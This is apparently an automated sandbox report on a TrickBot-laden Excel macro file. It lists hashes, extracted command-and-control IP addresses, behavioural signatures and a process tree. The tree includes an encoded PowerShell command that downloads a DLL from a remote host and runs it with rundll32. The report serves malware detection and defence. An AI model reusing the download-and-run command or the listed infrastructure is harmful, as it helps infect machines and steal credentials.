Analysis
-
max time kernel
129s -
max time network
139s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
14-10-2021 18:06
Static task
static1
Behavioral task
behavioral1
Sample
doc2_5.xlsm
Resource
win7-en-20210920
General
-
Target
doc2_5.xlsm
-
Size
130KB
-
MD5
bb9509e3a758f80aba854fbf3f1fb7be
-
SHA1
45389b76ed4ad5d41205b754775de4f9f3fd1076
-
SHA256
6cdc36e5c8774b62bbeeaa2141af5fd3c9c5ca33e0197e6301f76f23e59e9e22
-
SHA512
c11c2e545ca8d092c772a8d2bda01bb82be89b81f2ac3c0d2e478972b5606ed8405fc350d993434cd4023b4ff958dd83e470f89d3726a144de766ba5cbc550e7
Malware Config
Extracted
trickbot
100019
sof1
65.152.201.203:443
185.56.175.122:443
46.99.175.217:443
179.189.229.254:443
46.99.175.149:443
181.129.167.82:443
216.166.148.187:443
46.99.188.223:443
128.201.76.252:443
62.99.79.77:443
60.51.47.65:443
24.162.214.166:443
45.36.99.184:443
97.83.40.67:443
184.74.99.214:443
103.105.254.17:443
62.99.76.213:443
82.159.149.52:443
-
autorunName:pwgrabbName:pwgrabc
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3116 1500 cmd.exe 68 -
Blocklisted process makes network request 1 IoCs
flow pid Process 30 832 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
pid Process 1780 rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1500 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 832 powershell.exe 832 powershell.exe 832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 1140 wermgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE 1500 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1500 wrote to memory of 3116 1500 EXCEL.EXE 72 PID 1500 wrote to memory of 3116 1500 EXCEL.EXE 72 PID 3116 wrote to memory of 832 3116 cmd.exe 74 PID 3116 wrote to memory of 832 3116 cmd.exe 74 PID 3116 wrote to memory of 3936 3116 cmd.exe 75 PID 3116 wrote to memory of 3936 3116 cmd.exe 75 PID 3936 wrote to memory of 1780 3936 rundll32.exe 76 PID 3936 wrote to memory of 1780 3936 rundll32.exe 76 PID 3936 wrote to memory of 1780 3936 rundll32.exe 76 PID 1780 wrote to memory of 4020 1780 rundll32.exe 77 PID 1780 wrote to memory of 4020 1780 rundll32.exe 77 PID 1780 wrote to memory of 4020 1780 rundll32.exe 77 PID 1780 wrote to memory of 1140 1780 rundll32.exe 78 PID 1780 wrote to memory of 1140 1780 rundll32.exe 78 PID 1780 wrote to memory of 1140 1780 rundll32.exe 78 PID 1780 wrote to memory of 1140 1780 rundll32.exe 78
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\doc2_5.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B /MIN /WAIT powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi3⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe5⤵PID:4020
-
-
C:\Windows\system32\wermgr.exeC:\Windows\system32\wermgr.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
-
-